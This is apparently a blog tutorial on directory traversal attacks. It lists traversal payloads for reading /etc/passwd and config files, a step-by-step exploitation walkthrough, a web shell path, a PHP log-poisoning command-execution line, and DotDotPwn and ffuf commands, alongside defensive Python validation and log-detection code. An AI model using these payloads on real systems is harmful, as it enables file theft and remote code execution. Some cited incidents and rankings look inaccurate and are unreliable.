Hey guys, Rocky here! 🚪🔓
Welcome to Day 9 of the Daily Web Hacking series! So far, we’ve tackled authentication bypasses, file upload vulns, and XSS. Today, we’re diving into Part 9: Directory Traversal—the hack that lets you “escape” a website’s restricted folders and rummage through the server’s entire file system. Imagine breaking out of a prison cell only to find the warden’s secret file cabinet. Let’s get into it!
—
What is Directory Traversal?
Directory Traversal (aka Path Traversal) is a vulnerability that allows attackers to read, write, or execute files outside the web root directory (the folder where the website’s public files live). By manipulating file paths (e.g., ../../), hackers can:
- Steal sensitive files (/etc/passwd, .env, backups).
- Access source code or configuration files.
- Plant malware or overwrite critical system files.
Why it’s dangerous:
- #4 in the OWASP Top 10 (Path Traversal, 2021).
- Found in 33% of web apps (Snyk, 2023).
- Can lead to full server compromise.
—
How Directory Traversal Works
Web apps often use user-supplied input to load files (e.g., profile pictures, PDFs). If the app doesn’t sanitize input properly, attackers can inject path sequences like ../ to “escape” the web root.
Example:
A site loads user avatars via:
https://site.com/load?file=rocky.jpg
An attacker changes file=rocky.jpg to:
file=../../../../etc/passwd
Result: The server returns the /etc/passwd file, exposing system users!
—
Types of Directory Traversal
1. Basic Traversal
Use ../ (Unix) or ..\ (Windows) to climb directories.
Payload:
../../../../etc/passwd
2. Encoded Traversal
- Bypass filters with URL encoding, double encoding, or Unicode.
- Payloads:
- URL-encoded:
..%2F..%2Fetc%2Fpasswd
- Double-encoded:
..%252F..%252Fetc%252Fpasswd
3. Null Byte Injection
Terminate the filename early to bypass an extension the app appends.
Payload:
../../etc/passwd%00.jpg
The server processes passwd%00 as passwd, ignoring .jpg. This only works on old runtimes (PHP stopped accepting null bytes in file paths in 5.3.4); modern servers reject such paths.
4. Absolute Path Abuse
Directly reference absolute paths (if allowed).
Payload:
/etc/passwd
—
Real-World Directory Traversal Disasters
- Apache (2019): CVE-2019-0211 allowed traversal via PHP scripts.
- WordPress (2017): Plugin flaw exposed wp-config.php files.
- Tesla (2018): Misconfigured servers leaked vehicle telemetry.
Lesson: Even tech giants mess up.
—
Step-by-Step Exploitation
Goal: Steal the /etc/passwd file from a vulnerable photo-sharing site.
1. Find a Vulnerable Endpoint
Look for parameters like ?file=, ?page=, or ?load=.
Example URL:
https://hacklivly.com/view?image=profile.jpg
2. Test Basic Traversal
Modify the parameter:
image=../../../../etc/passwd
If the server returns the file, you’ve won!
3. Bypass Filters
If blocked, try encoding:
image=..%2F..%2Fetc%2Fpasswd
Or add a null byte:
image=../../etc/passwd%00.jpg
4. Escalate Access
- Steal config files: .env, config.php, wp-config.php.
- Execute code: If you can write files, upload a web shell.
—
Advanced Traversal Tactics
1. Writing Files
How: If the app lets you upload or modify files.
Payload:
../../var/www/html/shell.php
Impact: Execute commands via https://site.com/shell.php.
2. Log Poisoning
Inject PHP into log files (e.g., access.log) by sending it in a request, then traverse to them. Note that this only pays off when the app include()s the file rather than just reading it, i.e. it is really a local file inclusion bug:
GET /<?php system($_GET['cmd']); ?>
Trigger execution:
https://site.com/view?file=../../var/log/apache2/access.log&cmd=id
3. PHP Wrappers
Use php://filter to read encoded files:
file=php://filter/convert.base64-encode/resource=../../etc/passwd
Decode the Base64 output to get the file.
—
Tools for Directory Traversal
1. Burp Suite
- Repeater: Test payloads manually.
- Intruder: Brute-force common paths (/etc/passwd, .env).
2. DotDotPwn
Automated directory traversal tool:
dotdotpwn -m http -h hacklivly.com -x /load?file=TRAVERSAL
3. FFUF (Fuzz Faster U Fool)
Fuzz for exposed files:
ffuf -w paths.txt -u https://hacklivly.com/view?file=FUZZ
—
Defending Against Directory Traversal
For Developers
Input Validation
Block ../, ..\, and absolute paths.
PHP Example (note that basename() keeps only the final path component, so it is only a complete fix when every allowed file lives in one flat directory):
$file = basename($_GET['file']); // Strips path info
Whitelist Allowed Files
Use a mapping of allowed filenames (Python, with a Flask-style request object):
allowed_files = {"profile.jpg": "images/profile.jpg"}
file = allowed_files.get(request.args.get('file'), "default.jpg")
Use Platform-Safe Functions
Python: os.path.realpath() + check that the resolved path is inside the web root.
Java: Path.normalize() + validate.
Store Files Outside Web Root
Serve files via a secure proxy script.
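Here is an added example (my code, not from the original post) that puts the three developer defences above together for the avatar-loading endpoint described earlier: a realpath() containment check that survives the encoded, double-encoded, null-byte, backslash and absolute-path payloads listed on this page, plus the allow-list mapping. The storage directory /srv/app/uploads and the file names are assumptions for illustration.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed example: uploads live in a dedicated directory outside the web root.
# The directory name is an assumption, not a path from the post.
FILE_ROOT = os.path.realpath("/srv/app/uploads")

# Allow-list of public names -> real files (the mapping approach from the post).
ALLOWED_FILES = {"profile.jpg": "images/profile.jpg", "rocky.jpg": "images/rocky.jpg"}


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo URL encoding until stable so %2F and %252F can't hide a separator."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def resolve_user_path(user_file: str, root: str = FILE_ROOT) -> Optional[str]:
    """Return the absolute path of `user_file` inside `root`, or None if unsafe."""
    decoded = fully_decode(user_file)
    # A null byte would truncate the name in C-level APIs; reject it outright.
    if "\x00" in decoded:
        return None
    # Treat backslashes as separators so ..\ payloads get the same treatment as ../.
    decoded = decoded.replace("\\", "/")
    # Absolute paths never belong in a filename parameter.
    if decoded.startswith("/"):
        return None
    # Canonicalise (collapses ../ and follows symlinks), then check containment.
    candidate = os.path.realpath(os.path.join(root, decoded))
    # commonpath, not startswith: "/srv/app/uploads2" must not pass for "/srv/app/uploads".
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def resolve_allowlisted(user_file: str) -> str:
    """Allow-list variant: anything not in the map falls back to a default file."""
    return os.path.join(FILE_ROOT, ALLOWED_FILES.get(user_file, "images/default.jpg"))
```

Whatever resolve_user_path() returns is safe to open; a None result should become a 400/404, not a silent fallback that hides probing from your logs.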
For Admins
File Permissions
Restrict read/write access to web directories.
chmod 755 /var/www/html
Web Application Firewall (WAF)
Block requests with ../, etc/passwd, etc.
Log Monitoring
Alert on repeated traversal attempts.
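As an added example (not from the original post) of the “alert on repeated traversal attempts” rule, here is a small detector run over a constructed access log. It decodes each request target before matching so the URL-encoded and double-encoded payloads from this page are caught, checks the raw target for overlong UTF-8 separators, and raises an alert per source IP once a threshold is crossed. The log lines, IPs and threshold are all made up for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access log (combined-format style); these are not real requests.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Mar/2024:10:01:01 +0000] "GET /view?image=profile.jpg HTTP/1.1" 200 5120
10.0.0.7 - - [09/Mar/2024:10:01:02 +0000] "GET /view?image=../../../../etc/passwd HTTP/1.1" 403 211
10.0.0.7 - - [09/Mar/2024:10:01:03 +0000] "GET /view?image=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 211
10.0.0.7 - - [09/Mar/2024:10:01:04 +0000] "GET /view?image=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 403 211
10.0.0.7 - - [09/Mar/2024:10:01:05 +0000] "GET /view?image=../../etc/passwd%00.jpg HTTP/1.1" 403 211
10.0.0.9 - - [09/Mar/2024:10:01:06 +0000] "GET /view?image=rocky.jpg HTTP/1.1" 200 4096
10.0.0.9 - - [09/Mar/2024:10:01:07 +0000] "GET /docs/..%c0%af..%c0%afetc/passwd HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# After decoding: dot-dot with either separator, or an embedded null byte.
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|\x00")
# Overlong UTF-8 forms of '/' and '\', checked on the raw target because
# unquote() turns these invalid bytes into U+FFFD and the pattern would be lost.
OVERLONG_RE = re.compile(r"%c0%af|%c1%9c", re.IGNORECASE)


def is_traversal_attempt(target: str) -> bool:
    # Two decode rounds so a double-encoded %252F is seen as the '/' it becomes.
    decoded = unquote(unquote(target))
    return (TRAVERSAL_RE.search(decoded) is not None
            or "/etc/passwd" in decoded.lower()
            or OVERLONG_RE.search(target) is not None)


def find_traversal_attempts(log_text: str):
    """Return (ip, target, status) for every request that looks like traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m["target"]):
            hits.append((m["ip"], m["target"], m["status"]))
    return hits


def alerts(log_text: str, threshold: int = 3):
    """IPs with at least `threshold` traversal-looking requests in the window."""
    per_ip = Counter(ip for ip, _, _ in find_traversal_attempts(log_text))
    return {ip: n for ip, n in per_ip.items() if n >= threshold}
```

A 403 from the app is not the end of the story: the same IP sending several variants in a row is the signal worth paging on, so feed the alert dict into whatever ticketing or blocking you already have.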
—
Practice Legally: Labs & Challenges
- DVWA (Damn Vulnerable Web App):
- Practice traversal in the File Inclusion module.
- PortSwigger Labs:
- Free labs: Directory Traversal.
- Hack The Box:
- Machines like Traverxec focus on path traversal.
—
Ethical Hacking & Reporting
Never exploit traversal vulns without permission. If you find one:
- Document: Record steps to reproduce.
- Report: Use the site’s security contact or bug bounty program.
- Disclose: Wait for a fix before sharing publicly.
—
Final Thoughts
Directory traversal is the digital equivalent of picking a lock. It’s simple, silent, and shockingly effective. By validating inputs, hardening servers, and thinking like a hacker, you can slam the door on this attack.
Remember: The web’s security depends on you. Find flaws, fix them, and keep the internet safe—one ../ at a time.
Rocky out! ✌️
—
P.S. If you’re loving this series, share it with your crew! Let’s turn script kiddies into security guardians.
Discussion Question: What’s the wildest file you’ve accessed via traversal? I once found a database backup chilling in /var/backups. 😅 Spill your stories below! 👇